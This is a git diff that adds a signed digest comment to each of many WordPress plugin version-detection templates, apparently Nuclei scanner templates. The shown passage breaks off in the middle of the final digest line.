newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..d9bc7f4944 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ece851642ba109c733aa01d4148b404231398c5cc2e050d834f94cc4957def33022100c01f0aaa4eb0d06da323accefcbb176755f80033f7af1aa1aefdb38cbcb37d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..425cd9b0d4 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054bc6cfc5e4dc0fa78c8d6433f71802c17618ae83cc25818653bc4caacc0198602204218587205faa3718396c62fcf91863da6ab37130bc54e4408e337481fffc85a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..04607a7802 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206b132130b5c3a5685d485c03578c10d237a780cbac505ded81a2ffada4c07b24022073465989d4b7049fe61e0427669caea1893b55fdf507e9424a0dc1762705dc79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..b234723b88 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203dcb4f10e5c50d21ef2e99af5d813277b4ac63300e19c38dd5bc1e60301080f10220708c94fd6329821c4a892e04dad99a8ca604a155e27974d863b7a811f098e974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..3e44f01641 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd3fae995dea10a9fc4432bacbc704e57a7b4fb84c1e7fcade4a6393ca73b69c022100af22b0492f77ddad453919bf052a8731564f2bced7a9a93ba58a99ce44d8597e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..2d5bfcde38 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f90da1d7cb20b2f0148b7253b25afc1402d9a33dd8859bdb0299ba24164997d7022100f0f66d0d91d0552a8d8bb50a80dddfd91d0e7c1e264859b227caf6972fc8f30a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..f7819f7f85 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203cfc77ee657fa6bf6f4847c6bdfa3ce84ec7dded5507566fbcf615ca48415d38022044622c6f325f8f3e0fd42e6f5f42b22c464c2568609dc87d7c3fc939a39e897f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cd248e018b..8d0343d4ce 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100899aee8242911f0ca126bbe1560ae0b434a0447db4a4ae32a477a980d9c1721c022100d164ea05724291dcfaa9cde37ef5f811ff8a775eb1e9d42a90428a2b7b27288d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 0993372ced..acd33a1fb5 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202aa8a7d2112461b7e4e20ab727c61f72bf1770ebe35532d6c31630c010309701022100ec3f3d15bc8cc5bf031696d1a434ced47538cb9d1944da2aefdd1a9a584a43d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 7e62a84cca..2aa181c355 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210086875c5c4254b27f17fbe6f9a737672a539137bab1e8e38871000630ac62cfe2022100c8c0d8b29928aa74e33054c3a1d36f36f13f21090e7f084f0cc958031c5d5600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..0873e30478 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032087edaa071f743492eafeb4c111f7a078aa8933bcb0fcc41897ca0c542c390022060f8a671b78c96c368bbb19f92084bf1861c1c37d57f311e4ce22e0943588119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..1ade333bca 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021af03fc1f5804459179224717997f824cafb654cfbaf7514dcdb6a43052f8160220716e6ddc87d27849febbec984485a0464933a555042d0d1860fd5d16615b88e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c7ae2d51dd..0c681c40be 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1303be23f9d33a26254d80aaa74869b8942a3c3377825c0611b039cacd3e58902205dfc37b55914d62c1b9497bb9c00d13f5e5bc479421f26637e111160532332ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..d446a6eec5 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000de9e9c235016113e08dae840a153cd0c21de047ae86dac90ae987230ed99e1022100cc0f03badc2132a521ca8d5864e5e46e0827a13f4ff12601fc6e56ca958ac4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..161133ba33 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069e677dfce5c639725692d7b15b7f72defd27b97b60df33884a8e598dd97cdf702203784289a2916628a6cb135ae3e7437fb4e212513ef48f8dd2fc2161e562a818f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..318d640d60 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100822cd958e14f9f2bd55b797469cd05c3770d4f6feee5a6ef2527a1e9b12c5c55022100d3c4350ed58e9c1f709d69813a0ef1d6ddb87072be2fbbd9515564d3a29e9dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..993e5286c7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7a28aee8e038ddb21b1689f13d7bc8614644c4934f25e2d22a6f33d3d72060c02200b3fe331d883773cdd236c6ca38da992d105a368724064033f30a8565deddb94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 299e5e4cb6..68e202637d 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100888c0a2411dff95c1403be294c7ea4edf714a5895be2cb684c666b9f771bb4b3022042a25fb458c1c92995f567ca52b740184543d6318776dcdfc46b3f4edea144c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..5f741768b5 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8cd64804a50a795d3396c4e99e988b5532a507e90d547e33ed57acbbd428a5702207b555faecd83b2893d01173abe13f6194a9182e9c8137f2a59b90e274ac32d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..f962991d3b 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d948449666993f2ecfe4e988eece348845152b3972eb7175767326fbda1500a302201b560d4c47c8e1d13bd53a378baffe5d23980ddb17847ee3b81aa015eb5df8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..41fe01554a 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed3a8d60db4bec2f6294acdbd79faf491a8056a090278516f35210b7c192620802200fa09e9f9a81d9a052e4a8075a4d387a186534f263c1dfbe2cb5752af36279e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..a4a6d5f448 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e23f6efc616cc6f7b454460298acf182c6d15bea577924d5f46ada7887dc543a022100f563453bab4af0447c875a570d1b38b6cb37e25506af2cf971cf938b313cb7ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..397d846342 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220397f4055b0eea858a5f81cc976a81ab4d5c5c9085abf712c7c4eb25fd2458119022100ef9e17d59b3367bf33f82e59015c05fa0850171c12bf7b18460951e0009e47bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..549b1cf682 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007538c05f25abdaca40e09c268ca7ce7406168f9dcf0ab73005c10b8ba242ea802205258edde22e1fbd4c8874344a75af98ceae8608dd8670643c601e3367e55cf07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..9aba7e6102 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017ce7acfcfdf89d2794284511dea6fec142f0bab6caaa1b8ee41f5b3932a7482022100c01a940ca075abe026c1ccf2c750a094fab4650c109b283876eeba96be6a33c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..8acd64c01d 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220478abe05b63eda6884e1cc678293417193b14bf407af3badc9b6f6762f81bf8202202b21ee4d66bbdfbc916055ccd2db378a75f8a5eeaee3be32532802ad4f6391cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..a9df68e9d3 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a16ab9d6f7562cb977211004987e3d7e5ea9dc51fa12b26012682cb1bf58d4c022100e039b9d721b7617b2c6c77fc43365347dbfbc724437f0349d34bd0f16a88c2f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..906f78d62e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e97fc4da647b49a765e8fed38fbf72211e6b915488c962637510c21d54905649022100fce97014e517e0450b84792ce09e92f60f5f02b008371a8f14195c84ff11e6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..b215d73bae 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba2edd6e0ca4d48220d46be91b6df4873950d73ed0dafe9cf057df57477229ff02210088c5ee722af91fe733b709ecd4cb71a0f58db25afc70055e2d35278c37fb6ee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5685dd5f08..3a26e3aaf3 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203478393cf30451d7450be0782832d9599643d5f746cee8161357397fcd9af3c702204fe34fa3c82e936f3c0731ed91cb73732d7a3952670f41757a9c3cdd089f726a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..dd58df5ac6 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8f44e6cc4295c86116baa189df1c7b47b83367f4a0a608ee62ce5e8476eb501022100e0fbc57830a368dea050c5b1903c929191d714f19943709d84c6d82a499898df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..d532c8910f 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfab73a641db3a2cc668cb5a8837c45a66345ca33bca99dfccc84cd42a1329250221008a05ff754701501e7d4dd04365c22e5d3a66240571179a83f759a06a8dc2d0af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..5cd06c3080 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048909356c398590a508513188a319ef4c84fdff5a3a3197892a57a6be486f92c022100c115746ab2d9d0f2b3113460603c6fcba27b3f2c8b1e61a526d75b2159a9c99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..66b92eb428 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205fd24ee812815539e86b59ce526905b0a47ada05b2252ddb88b45696bb79a758022100b42d031aadac3339cbf5dcca07a0ff54890b01e8fca34b7e0291b162d1442189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index effba09471..1abade583d 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220436021e39d8efaa9d7c0070b70d13b55b5167fab5e2bde0c74664c5fd8513d63022100ee1c712160952847c9a801c0cd71def53d05c17a937df72090ba478222736b13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 37153b7ae5..25ee37c26d 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8c998c26a057b48aa7adf1dc83e03c909e353290d34b5c3d1d1195612a062c2022100a8e93d5b9d7b7bd9269302d00557d3ed2594ad255a81450d9225b917c3c3ca25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..a5a7bbf2e2 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091f076723cfa73cdc1ae3c66f719a81e658a9ef2ee04f03d5c4cf2522b5a1a64022007ca5da80842e084f2e59dd6b367a55e8f1effd109a9ed59849ea441eb98355a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..e2cb646d99 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa27a3891646be4856e3ce9877879b624a5d3dc14882ad2330abb5be43a87a1702207effb46e16b3fc723e682d7be95b1d232c0000e5690279cb263a7020b813f637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3462f5ea6b..4053ce69f3 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207903c8ed22fe823b1ad3983b5561bf7a7264c683d74736ffe98dc76254d927d4022100b3e24c2444aa5238438950c533cd09726b2396740dd041a9a2b6821fdc9d1b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5c9ae8bc4f..9fcbfdb1e3 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220584775b3dd588c39346b4768f56758ed97b6bf21c6179146a33d6c02edb25a3c022100a48211a32bc1ec7dc9b0ad6bc48139d1dddb0ab796f026bccd12016b532779d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..df4cabc2d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e7b88fe46258318a9f04b76fed111548b810c671728cbfb448fa47351749d0a022100b52d9db3df56dbf4ab4597790b0d99fb55cf81dd4ec2cb19c6b0f2de9eea897a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..465b4ee364 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050a4392e967b3ac1e96512d2597ebcdb5d85b305dd2508ce09783e85c69a3e0b02200900c535b2835f676c59990fed6e5c4fba5bb949ce501e29274d61992bf1dcfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..baae75c6a7 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205822b83925588d791f14ad71f790775189041cf624ba1c241e32193d7267531c022050c42bc9d40d5c9636a15b345d6392c16474d0e44dae2d895a447b281b934226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..5366a1a2a9 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bcb5fab2e1ba95720c36a7af0a31173cb00118c2207634f2ed11f8ce84cd85a3022100e105dc3dd54602fb96d915dc0f5af4064ee353e660d82a22e9e01b3846833394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..c30a9847d0 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022056f754dfcd15f0ac1e145357658bf9e2db2dd2ea4718facb2991e07066e0bdc10220793f7b384e1808a7059b677013009d2729987708890cb4698591a015908bbc1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 6ff90e0902..5bce92525c 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c83beb0a14cf55b7746902f73563d5062df78e5d8a659e337b04c42599a6cd700221008d0b82e10889e05d8d45287a0fecf78bc23ae14c17ca7076d14d15184fc489de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..2dff4ee352 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c32d6e5f12ef4294f0afd036d2c1193913ed5e115aa3b89272affdd8c9da0641022100fbe20f2be599ddbe625ae5db2ba5a455a4b7e5a9e117feb77af73c36619f7436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..27c833bd7c 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 